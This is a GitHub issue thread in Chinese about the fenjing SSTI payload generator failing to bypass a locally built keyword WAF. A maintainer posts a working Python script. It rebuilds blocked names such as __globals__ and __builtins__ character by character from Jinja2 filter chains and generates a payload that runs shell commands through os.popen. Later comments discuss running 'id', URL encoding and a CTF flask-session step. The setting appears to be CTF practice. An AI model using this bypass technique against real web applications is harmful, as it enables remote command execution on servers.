-
Notifications
You must be signed in to change notification settings - Fork 34
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
这个waf在本地搭建后用fenjing测试没绕成功 #4
Comments
这个主要是百分号字符和数字100没法绕过,手动将规则加入生成器后就可以了,代码如下: from fenjing import const
from fenjing.full_payload_gen import FullPayloadGen
import logging
logging.basicConfig(level=logging.INFO)
blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
'posix', 'builtins', 'namespace', 'open', 'read', '\\', 'self', 'mro', 'base',
'global', 'init', '/', '00', 'chr', 'value', 'get', "url", 'pop', 'import',
'include', 'request', '{{', '}}', '"', 'config', '=']
def waf(s: str):
return all(word not in s for word in blacklist)
def get_char(target):
"""
根据给定的字符生成对应的payload
"""
d = {
"(x|pprint|list|batch(X)|first|last)": {
0:'!', 1:'U', 2:'n', 3:'d', 4:'e', 5:'f', 6:'i', 7:'n', 8:'e',
},
"(lipsum|string|list|batch(X)|first|last)": {
0: '!', 1: '&', 2: 'f', 3: 'u', 4: 'n', 5: 'c', 6: 't', 7: 'i', 8: 'o', 9: 'n', 10: ' ', 11: 'g', 12: 'e', 13: 'n', 14: 'e', 15: 'r', 16: 'a', 17: 't', 18: 'e', 19: '_', 20: 'l', 21: 'o', 22: 'r', 23: 'e', 24: 'm', 25: '_', 26: 'i', 27: 'p', 28: 's', 29: 'u', 30: 'm', 31: ' ', 32: 'a', 33: 't', 34: ' ',
},
"(()|batch(1)|string|list|batch(X)|first|last)": {
0: '!', 1: '&', 2: 'g', 3: 'e', 4: 'n', 5: 'e', 6: 'r', 7: 'a', 8: 't', 9: 'o', 10: 'r', 11: ' ', 12: 'o', 13: 'b', 14: 'j', 15: 'e', 16: 'c', 17: 't', 18: ' ', 19: 'd', 20: 'o', 21: '_', 22: 'b', 23: 'a', 24: 't', 25: 'c', 26: 'h', 27: ' ', 28: 'a', 29: 't', 30: ' ',
}
}
for outer, inner in d.items():
for i, c in inner.items():
if c == target:
return outer.replace("X", str(i))
raise Exception()
def main():
"""
FullPayloadGen生成的payload由两部分组成
后面的部分是用户实际要求的payload,一般由{{}}包裹
前面的部分,即下方的context_payload, 仅为后面的部分准备上下文,一般为{%set xxx=yyy}
前面为后面准备的变量存储在context字典中,键是生成payload时需要用到的表达式,值是此表达式对应的值
"""
full_payload_gen = FullPayloadGen(waf)
# 让FullPayloadGen先分析waf函数
full_payload_gen.do_prepare()
print(f"{full_payload_gen.context=}", )
print(f"{full_payload_gen.context_payload=}", )
chr_payload = (
"lipsum|attr(GLOBAL)|attr(GETITEM)(BUILTINS)|attr(GETITEM)(CHR)"
.replace("GLOBAL", "+".join(get_char(c) for c in "__globals__"))
.replace("GETITEM", "+".join(get_char(c) for c in "__getitem__"))
.replace("BUILTINS", "+".join(get_char(c) for c in "__builtins__"))
.replace("CHR", "+".join(get_char(c) for c in "chr"))
)
chr_in_lipsum = (
"{%if(lipsum|attr(SETATTR)(()|string, CHR_PAYLOAD))%}{%endif%}"
.replace("SETATTR", "+".join(get_char(c) for c in "__setattr__"))
.replace("CHR_PAYLOAD", chr_payload))
# 再将对应的payload放进FullPayloadGen中
# 生成payload时需要用到的表达式,表达式对应的值,使用这个表达式需要增加的payload
for literal, value, payload in [
("(lipsum|attr(()|string))(37)", "%", chr_in_lipsum),
(hex(100), 100, "")
]:
full_payload_gen.context[literal] = value
full_payload_gen.context_payload += payload
payload, _ = full_payload_gen.generate(const.OS_POPEN_READ, "echo 11111111111")
print(payload)
if __name__ == "__main__":
main() 我还在将这个规则加入到生成器中,可以参考上方的脚本加入规则并生成payload |
生成的payload非常长,如果有更好的payload也可以告诉我 |
找到一个更加简单的方法,已经加进去了,使用 |
可以加一个手动设置cookie的参数吗,有一道题需要手动修改flask-session,即cookie值后,才能进入到SSTI入口。 |
可以考虑一下 |
而且大佬,因为是GET请求,尝试了一下命令执行id命令,payload有这么长: |
测试成功了,原来是少了url编码,谢谢! |
提供一个更短一些的官方payload:
|
blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
'posix', 'builtins', 'namespace','open', 'read', '\', 'self', 'mro', 'base',
'global', 'init', '/','00', 'chr', 'value', 'get', "url", 'pop', 'import',
'include','request', '{{', '}}', '"', 'config','=']
The text was updated successfully, but these errors were encountered: